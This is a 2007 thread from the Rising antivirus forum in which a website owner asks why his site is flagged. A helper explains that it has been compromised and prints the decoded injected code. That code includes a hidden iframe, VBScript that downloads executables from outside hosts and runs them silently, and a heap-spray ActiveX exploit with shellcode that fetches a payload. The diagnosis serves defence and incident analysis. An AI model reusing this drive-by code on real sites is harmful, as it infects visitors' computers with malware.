瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 请问我的网站然病毒了,怎么了,朋友提示,有病毒
rulioo - 2007-2-15 19:45:00
www.rulioo.com

只有瑞星报错~~ 其他的软件都不提示。

我下载了全部的代码,没有发现问题。

请教了~~~ 是不是。。。。。。

想不通

附件: 8453082007215193545.gif
mopery - 2007-2-15 20:27:00
<script language=javascript src=/testbak.js></script>
早被挂了..

<iframe src=http://www.hb-hack.com/ppx/wm/520hack.htm width=0 height=0></iframe>

解密后代码如下
Invalid keyboard code specified
<html><head><meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" /><title>5A0f4zBk</title></head><body><script>
t="<script language="VBScript">    on error resume next
    Set adaWSAsjii__HSA = document.createElement("object")
    adaWSAsjii__HSA.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    Set adagoogA = adaWSAsjii__HSA.CreateObject("Microsoft.XMLHTTP","")
    caogoogA1="Ado"
    caogoogA2="db."
    caogoogA3="Str"
    caogoogA4="eam"
    CnisjIoa__WA=caogoogA1&caogoogA2&caogoogA3&caogoogA4
    Cnisjii__WA=CnisjIoa__WA
    Set opaipPada = adaWSAsjii__HSA.CreateObject(Cnisjii__WA,"")
    opaipPada.type = 1
    adagoogA.Open"GET","http://www.hb-hack.com/ppx/wm/wm1.exe",False
    adagoogA.Send
    Set fso = adaWSAsjii__HSA.CreateObject("Scripting.FileSystemObject","")
    Set temp = fso.GetSpecialFolder(2)
    filename=fso.BuildPath(temp,"CiKE.exe")
    opaipPada.open
    opaipPada.write adagoogA.responseBody
    opaipPada.savetofile filename,2
    opaipPada.close
    Set exc = adaWSAsjii__HSA.CreateObject("Shell.Application","")
    exc.ShellExecute filename,"","","open",0
    </script>
<script language="VBScript">    on error resume next
    Set adaWSAsjii__HSA = document.createElement("object")
    adaWSAsjii__HSA.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    Set adagoogA = adaWSAsjii__HSA.CreateObject("Microsoft.XMLHTTP","")
    caogoogA1="Ado"
    caogoogA2="db."
    caogoogA3="Str"
    caogoogA4="eam"
    CnisjIoa__WA=caogoogA1&caogoogA2&caogoogA3&caogoogA4
    Cnisjii__WA=CnisjIoa__WA
    Set opaipPada = adaWSAsjii__HSA.CreateObject(Cnisjii__WA,"")
    opaipPada.type = 1
    adagoogA.Open"GET","http://www.es86.com/pic/ddb/2006692151148920.gif",False
    adagoogA.Send
    Set fso = adaWSAsjii__HSA.CreateObject("Scripting.FileSystemObject","")
    Set temp = fso.GetSpecialFolder(2)
    filename=fso.BuildPath(temp,"taskmgr.exe")
    opaipPada.open
    opaipPada.write adagoogA.responseBody
    opaipPada.savetofile filename,2
    opaipPada.close
    Set exc = adaWSAsjii__HSA.CreateObject("Shell.Application","")
    exc.ShellExecute filename,"","","open",0
    </script>
<script type="text/jscript">
function init() {
document.write("嬪榰mS梌lQ[]埆g\");
}
window.onload = init;
</script>"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script></body></html>
mopery - 2007-2-15 20:32:00
挂马页面 再次跳转
<frame src="http://www.hb-hack.com/qq.htm"  frameborder="no" scrolling="no"  noresize marginwidth="0" margingheight="0">

代码解密后 如下
<SCRIPT>var Words="<!--  axis' exploit!  -->

<html>
<head>
<script language="javascript">
var heapSprayToAddress = 0x0c010101;
var shellcode = unescape(`d@hNVhVh%Vh`Vhy@€8E$EjYUVPh6/pEPE hjYbE ~.e@xeu EjYUXE$3Su PSjY$ju EjYU]$A[RZSR]Vs<xVv 3IA3:@uZZ$fK^]URLMONttp://www.hb-hack.com/qq.exe

var heapBlockSize = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;
memory = new Array();

for (i=0;i<heapBlocks;i++)
{
memory = spraySlide + shellcode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

</script>

<script>
function doTest()
{
com.LaunchP2PShare("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c", 10000);

}
</script>
</head>
<OBJECT ID="com" CLASSID="CLSID:{AC3A36A8-9BFF-410A-A33D-2279FFEB69D2}"></OBJECT>
<script>javascript:doTest();</script>
</html>
";document.write(unescape(Words))</SCRIPT>

1
查看完整版本: 请问我的网站然病毒了,怎么了,朋友提示,有病毒
© 2000 - 2026 Rising Corp. Ltd.